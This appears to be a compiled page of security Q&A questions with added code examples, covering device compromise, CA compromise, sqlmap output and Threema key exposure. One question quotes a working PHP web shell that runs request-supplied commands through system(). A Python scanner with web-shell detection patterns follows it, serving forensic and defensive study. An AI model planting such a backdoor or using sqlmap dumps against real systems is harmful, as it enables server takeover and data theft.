Can an iOS backup be compromised?

I originally posted this on the Apple Stack Exchange but it was suggested that it was off topic, so I’m posting it here in hopes that this is a more relevant place for it.

Say that an iOS device has been compromised by some vulnerability. If one were to back up their device to their computer (or iCloud, but it’s my understanding that making an encrypted backup to a computer allows more to be stored in the backup, such as passwords) and then restore the OS and use the backup to restore settings, could the backup re-compromise the device?

Secondly, have there been any documented cases of persistent threats (outside of jailbreaks) that are remotely exploitable and can persist after a restore?

Could a Chromecast be compromised via its default open network?

I left my apartment for a few days, so I disconnected my wireless router, but I forgot to disconnect my Chromecast as well. I remember that when a Chromecast can no longer find the network it was connected to, it creates an open network that can be used to reconnect it to another wireless network.

The issue is that I’m away from my apartment for a few days and my Chromecast is probably currently broadcasting an open network that anyone can connect to.

Even if there is no internet connection on that open network, there are two things I’m worried about.

  1. The Chromecast could be attacked with a wireless exploit. We can’t know whether someone else’s computer is infected by malware, and the Chromecast could be attacked once that infected computer connects to it (for example, by running wireless exploits against it). In the worst case, an attacker could simply connect to that open Chromecast network and run exploits against it directly.

  2. It might be possible for someone who can attack the Chromecast to get the password of the wireless network the Chromecast was previously connected to. This password is presumably stored somewhere in the Chromecast’s memory, and with some access to the filesystem through a kind of jailbreak (for example, via point 1), it could be retrieved and used to connect to my wireless network.

Considering those two points, should I factory reset my Chromecast once I’m back in my apartment? Or, to be even safer, should I get rid of this Chromecast, considering that the firmware could have been compromised, and buy a new one?

How do I identify, characterize and detect whether trusted CAs are compromised?

What is the best approach to use in identifying, characterizing and detecting compromised CAs? I do not mean an invalid certificate or an invalid CA that can be identified during X.509 validation. I am looking for a tool/approach that can identify and detect a “trusted” CA that is actually compromised, for example where an attacker impersonates the CA or compromises its key and tries to issue fraudulent certificates or a fake CRL.

Apart from existing methods such as CT, key pinning, DANE etc., which partly address some issues related to CA compromise.

Is there a way that methods like blockchain, machine learning or any role-based approach could be used to first identify, characterize and detect whether a trusted CA is really compromised?

Server was compromised, found this line in a recently modified PHP file [closed]

I found this at the top of a PHP file in the web server:

<?php if(isset($_REQUEST['xxx'])){ echo "<pre>"; $xxx = ($_REQUEST['xxx']); system($xxx); echo "</pre>"; die; }?>

I’m guessing this is how they got the server to execute whatever commands they wanted to get in.

Does anyone know how this might have slipped into the PHP file in the first place? I know it’s an extremely vague and stupid question, but I’m stumped. Did they likely already have access to the server and slip this in as a backdoor for later?
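The one-liner quoted above is a classic command-execution backdoor: whatever arrives in the `xxx` request parameter is passed straight to `system()`. As an added example (not code from the original post or from any answer), here is a small triage scanner that walks a copy of a web root and flags exec/eval calls whose argument is request data, either used directly or through a variable assigned from request data earlier in the file, and lists the newest-modified files first since a dropped shell is usually among them. The two sample PHP files and the temporary directory are constructed for the demo.

```python
"""Added example, not code from the original post: a triage scanner for
PHP command-execution backdoors like the one quoted in the question.

Assumptions (constructed for the demo, not from the post): the two sample
file contents below; the scanner is pointed at a copy of a web root.
"""
import os
import re
import tempfile

# Functions that hand a string to a shell or to the PHP interpreter.
SINK_CALL = re.compile(
    r"\b(?P<fn>system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*"
    r"\((?P<args>[^()]*(?:\([^()]*\)[^()]*)*)\)",   # handles one level of nested parens
    re.I,
)
# Request data an attacker controls directly.
SOURCE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES)\b")
# "$name = <rhs>" (a single "=", so "==" is not treated as an assignment).
ASSIGN = re.compile(r"\$(?P<var>\w+)\s*=(?!=)(?P<rhs>.*)", re.S)


def _uses_request_data(text: str, tainted: set) -> bool:
    """True if text references a superglobal or a variable already marked tainted."""
    if SOURCE.search(text):
        return True
    return any(re.search(r"\$" + re.escape(v) + r"\b", text) for v in tainted)


def find_webshell_indicators(source: str) -> list:
    """Return one finding per exec/eval call fed by request data.

    Statements are split on ';', which is enough for one-liners like the quoted
    shell; comments, strings and obfuscated superglobals are not handled."""
    findings, tainted, pos = [], set(), 0
    for stmt in source.split(";"):
        lead = len(stmt) - len(stmt.lstrip())
        line_no = source.count("\n", 0, pos + lead) + 1   # line of the statement's first token
        pos += len(stmt) + 1
        for m in SINK_CALL.finditer(stmt):
            fn = m.group("fn").lower()
            if _uses_request_data(m.group("args"), tainted):
                findings.append({"line": line_no, "function": fn, "snippet": m.group(0).strip()})
            elif fn == "eval" and "base64_decode" in m.group("args"):
                # eval of a decoded blob is a backdoor signature even without visible input
                findings.append({"line": line_no, "function": fn, "snippet": m.group(0).strip()})
        a = ASSIGN.search(stmt)
        if a and _uses_request_data(a.group("rhs"), tainted):
            tainted.add(a.group("var"))   # propagate taint: $xxx = $_REQUEST[...]; $y = $xxx;
    return findings


def scan_tree(root: str) -> dict:
    """Scan every PHP file under root; results ordered newest-modified first."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_webshell_indicators(fh.read())
                results[path] = {"mtime": os.path.getmtime(path), "findings": hits}
    return dict(sorted(results.items(), key=lambda kv: -kv[1]["mtime"]))


# Constructed sample files: the quoted backdoor followed by ordinary code, and a
# file that calls a sink with a constant (a legitimate use, not a finding).
SAMPLE_BACKDOOR = (
    "<?php if(isset($_REQUEST['xxx'])){ echo \"<pre>\"; $xxx = ($_REQUEST['xxx']);"
    " system($xxx); echo \"</pre>\"; die; }?>\n"
    "<?php\n$title = htmlspecialchars($_GET['q']);\necho $title;\n"
)
SAMPLE_CLEAN = "<?php\n$out = shell_exec('uptime');\necho $out;\n"


def demo() -> dict:
    """Write the constructed files to a temp dir and report hit counts per file name."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", SAMPLE_BACKDOOR), ("status.php", SAMPLE_CLEAN)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        report = scan_tree(root)
    return {os.path.basename(p): len(r["findings"]) for p, r in report.items()}


if __name__ == "__main__":
    for hit in find_webshell_indicators(SAMPLE_BACKDOOR):
        print(hit)
    print(demo())
```

Run it against a copy of the web root, not the live tree, and treat the output as a starting point for timeline work (file mtimes against access logs for requests carrying the `xxx` parameter), not as a complete detector: a shell that builds `$_REQUEST` from string fragments or hides in a string will not match these patterns.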

SQLMap: How to create a .sqlite local copy of the compromised database?

I’ve been playing around with sqlmap and I’ve noticed that it creates a hidden folder named:

/%mycomputer%/.sqlmap/output 

where, inside, it also creates a folder for every SQL injection test:

www.example.1 www.example.2 

My question is the following: can I store the whole database in the file “session.sqlite”? If so, how? What is the command to place all the info gathered in the “session”?

Threema: Are received messages exposed, when sender’s private key gets compromised?

Note: This question is specific to the Threema Messenger, and relates to their implementation of encryption (using the NaCl ECDH implementation as per their docs).

I refer specifically to their “note on outgoing messages” in their validation document on their website:

It may seem strange that outgoing messages can be decrypted by entering the sender’s private key and the recipient’s public key, i.e. without knowing the recipient’s private key. …

Now, consider this scenario:

  • Alice has received a message from Bob, while Eve records/intercepts traffic as person-in-the-middle on the way to Alice.
  • Alice’s public key of course is public, but Alice never disclosed the private key.
  • Eve somehow gets the private key of Bob.

With Bob’s key and the traffic, could Eve now decrypt all content Bob has ever sent to Alice?

In other words, with Threema, is the privacy of received content dependent on the safety of the private key of the SENDER?
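The property the quoted note describes is a property of NaCl's crypto_box construction itself: the Diffie-Hellman shared secret computed from (sender's private key, recipient's public key) is the same value as the one computed from (recipient's private key, sender's public key), so the key that protected a message Bob sent to Alice can be rebuilt by anyone holding Bob's private key and Alice's public key. The following added example (not Threema's or NaCl's code) models that in pure Python. Only the X25519 key agreement is the genuine primitive (RFC 7748); the SHA-256 key derivation and the HMAC-authenticated XOR keystream are stand-ins for NaCl's HSalsa20 and XSalsa20-Poly1305, used so the block runs with the standard library alone. The key seeds, nonce and message are constructed for the demo.

```python
"""Added example (not Threema's or NaCl's code): a toy model of the crypto_box
key agreement showing why the sender's private key suffices to open a message.

Only the X25519 step is the real primitive (RFC 7748). The SHA-256 KDF and the
HMAC/XOR-keystream cipher stand in for HSalsa20 and XSalsa20-Poly1305 so this
runs with the standard library. Keys, nonce and message are constructed.
"""
import hashlib
import hmac

P = 2**255 - 19                      # field prime of Curve25519
A24 = 121665                         # (486662 - 2) / 4
BASEPOINT = (9).to_bytes(32, "little")


def x25519(scalar: bytes, u: bytes) -> bytes:
    """X25519 scalar multiplication, Montgomery ladder per RFC 7748 section 5."""
    k = bytearray(scalar)
    k[0] &= 248                      # clamp the scalar as RFC 7748 requires
    k[31] &= 127
    k[31] |= 64
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)   # mask the top bit of u
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def keypair(seed: bytes) -> tuple:
    """(private, public): the public key is the scalar times the base point."""
    return seed, x25519(seed, BASEPOINT)


def shared_key(my_priv: bytes, their_pub: bytes) -> bytes:
    """Symmetric key from the DH shared secret (NaCl uses HSalsa20 here; SHA-256 stands in)."""
    return hashlib.sha256(b"toy-box-kdf|" + x25519(my_priv, their_pub)).digest()


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "little")).digest()
        counter += 1
    return out[:n]


def box(my_priv: bytes, their_pub: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC with the shared key; output is tag || ciphertext."""
    key = shared_key(my_priv, their_pub)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return hmac.new(key, nonce + ct, hashlib.sha256).digest() + ct


def box_open(my_priv: bytes, their_pub: bytes, nonce: bytes, sealed: bytes) -> bytes:
    """Verify the tag, then decrypt. Raises ValueError if the key pair does not match."""
    key = shared_key(my_priv, their_pub)
    tag, ct = sealed[:32], sealed[32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed: wrong key pair or tampered message")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


def demo() -> dict:
    alice_priv, alice_pub = keypair(bytes([0x11] * 32))     # constructed seeds, not real keys
    bob_priv, bob_pub = keypair(bytes([0x22] * 32))
    mallory_priv, _ = keypair(bytes([0x33] * 32))
    nonce = bytes(range(24))                                 # crypto_box nonces are 24 bytes
    sealed = box(bob_priv, alice_pub, nonce, b"Hi Alice, this is Bob.")   # Bob -> Alice
    out = {
        "alice_reads": box_open(alice_priv, bob_pub, nonce, sealed),   # the intended recipient
        "eve_reads": box_open(bob_priv, alice_pub, nonce, sealed),     # Eve: Bob's private key + Alice's public key
    }
    try:                                                      # a third party without either private key fails
        box_open(mallory_priv, alice_pub, nonce, sealed)
        out["wrong_key_rejected"] = False
    except ValueError:
        out["wrong_key_rejected"] = True
    return out


if __name__ == "__main__":
    print(demo())
```

The `eve_reads` line is the scenario in the question: Eve never touches Alice's private key, yet with Bob's private key, Alice's public key and the recorded traffic she recovers everything Bob sent under that key pair. With a static (long-term) key pair, as the question assumes, the confidentiality of messages Alice received therefore depends on Bob keeping his private key safe; only a scheme that derives per-message keys from ephemeral secrets would change that.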